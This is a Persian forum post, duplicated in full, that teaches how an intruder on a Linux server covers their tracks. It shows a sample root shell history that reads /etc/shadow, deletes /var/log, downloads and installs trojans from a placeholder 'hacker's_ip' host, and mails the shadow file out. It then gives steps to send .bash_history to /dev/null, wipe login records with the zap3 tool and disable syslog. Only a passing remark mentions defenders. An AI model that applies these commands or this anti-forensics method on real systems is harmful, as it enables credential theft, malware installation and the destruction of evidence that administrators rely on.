kinglet
2008/05/13, 19:58
این پست در مورد اینه که چگونه یه هکر بعد از خراب کاری هاش لاگ ها رو پاک میکنه و هیچ ردی از خودش نمیگذاره!
Shell History
Command-line shells اکثرا یه فایل لاگ ایجاد میکنن که در اون دستورات اجرایی ثبت میشه. برای مثال یه bash shell یه فایل .bash_history ایجاد میکنه در دایرکتوری کاربر مربوطه (لاگین شده). کاربر root میتونه با دستور tail آخرین دستورات اجرائی توسط یوزر رو مشاهده کنه (پیش فرض ۲۰دستور آخر):
bash# tail -20 /root/.bash_history
cat /etc/shadow
rm -rf /var/log/*
ifconfig -a
netstat -nap
wget http://hacker’s_ip/trojans.tgz
mkdir …
mv trojans.tgz …
cd …
tar zxvf trojans.tgz
./configure
make
make install
ifconfig -a
ps U root
lastlog
ls -alR ~ | more
clear
route -n
cat /etc/shadow | mail hacker@hacker’s_ip
rm -rf /var/log/maillog
Disable Shell History
برای غیر فعال کردن command history logging, یه هکر میبایست فایل shell’s history رو به یک symbolic link در /dev/null تبدیل کنه:
bash# rm -rf /root/.bash_history
bash# ln -s /dev/null /root/.bash_history
حالا هنگام نوشتن روی فایل /root/.bash_history در /dev/null نوشته خواهد شد, که این فایل کاملا null و خالی هست! با این کار شما باعث شدید هر دستوری که بر روی سرور اعمال میشه همشون عملا پاک بشن.(برای برگردوندن به حالت اول هر کی سوال داشت بپرسه تا توضیح بدم)
Cleaning /var
دایرکتوری /var معمولا نکات زیر رو log میکنه:
■ utmp and wtmp شامل اطلاعات یوزرهایی که لاگین کردند
■ messages and secure با استفاده از syslog اطلاعات ارائه شده توسط application های مختلف رو log میکنه
■ xferlog اطلاعات رد و بدل شده توسط ftp رو log میکنه
■ maillog اطلاعات مربط به smtp رو log میکنه
■ lastlog اطلاعات مربوط به کاربرانی که به تازگی لاگین کردند رو log میکنه
یک هکر ممکنه بصورت دستی فایلهای مربوطه رو edit کنه تا حضورش همیشه پنهان بمونه! اما من خودم از یک tools بنام zap3 برای این منظور استفاده میکنم که تمامی اطلاعات utmp, wtmp, messages, secure و lastlog رو پاک میکنه. شما هم میتونید از این سایت دانلود کنید http://www.packetstormsecurity.org
اینم اضافه کنم که میشه حتی کلا سیستم logging رو بعنوان مثال از syslog غیر فعال کرد! مثه آموزش قبلی فایل syslog.conf رو به /dev/null منتقل میکنیم.
امیدوارم این آموزش اطلاعات لازم رو بشما داده باشه, اینم بگم این مسائل فقط برای هکرای عزیز مناسب نیست بلکه یه وبمستر خوب هم میبایست در این موارد تحقیق کنه.
منبع: http://kinglet.ir/?p=7
Shell History
Command-line shells اکثرا یه فایل لاگ ایجاد میکنن که در اون دستورات اجرایی ثبت میشه. برای مثال یه bash shell یه فایل .bash_history ایجاد میکنه در دایرکتوری کاربر مربوطه (لاگین شده). کاربر root میتونه با دستور tail آخرین دستورات اجرائی توسط یوزر رو مشاهده کنه (پیش فرض ۲۰دستور آخر):
bash# tail -20 /root/.bash_history
cat /etc/shadow
rm -rf /var/log/*
ifconfig -a
netstat -nap
wget http://hacker’s_ip/trojans.tgz
mkdir …
mv trojans.tgz …
cd …
tar zxvf trojans.tgz
./configure
make
make install
ifconfig -a
ps U root
lastlog
ls -alR ~ | more
clear
route -n
cat /etc/shadow | mail hacker@hacker’s_ip
rm -rf /var/log/maillog
Disable Shell History
برای غیر فعال کردن command history logging, یه هکر میبایست فایل shell’s history رو به یک symbolic link در /dev/null تبدیل کنه:
bash# rm -rf /root/.bash_history
bash# ln -s /dev/null /root/.bash_history
حالا هنگام نوشتن روی فایل /root/.bash_history در /dev/null نوشته خواهد شد, که این فایل کاملا null و خالی هست! با این کار شما باعث شدید هر دستوری که بر روی سرور اعمال میشه همشون عملا پاک بشن.(برای برگردوندن به حالت اول هر کی سوال داشت بپرسه تا توضیح بدم)
Cleaning /var
دایرکتوری /var معمولا نکات زیر رو log میکنه:
■ utmp and wtmp شامل اطلاعات یوزرهایی که لاگین کردند
■ messages and secure با استفاده از syslog اطلاعات ارائه شده توسط application های مختلف رو log میکنه
■ xferlog اطلاعات رد و بدل شده توسط ftp رو log میکنه
■ maillog اطلاعات مربط به smtp رو log میکنه
■ lastlog اطلاعات مربوط به کاربرانی که به تازگی لاگین کردند رو log میکنه
یک هکر ممکنه بصورت دستی فایلهای مربوطه رو edit کنه تا حضورش همیشه پنهان بمونه! اما من خودم از یک tools بنام zap3 برای این منظور استفاده میکنم که تمامی اطلاعات utmp, wtmp, messages, secure و lastlog رو پاک میکنه. شما هم میتونید از این سایت دانلود کنید http://www.packetstormsecurity.org
اینم اضافه کنم که میشه حتی کلا سیستم logging رو بعنوان مثال از syslog غیر فعال کرد! مثه آموزش قبلی فایل syslog.conf رو به /dev/null منتقل میکنیم.
امیدوارم این آموزش اطلاعات لازم رو بشما داده باشه, اینم بگم این مسائل فقط برای هکرای عزیز مناسب نیست بلکه یه وبمستر خوب هم میبایست در این موارد تحقیق کنه.
منبع: http://kinglet.ir/?p=7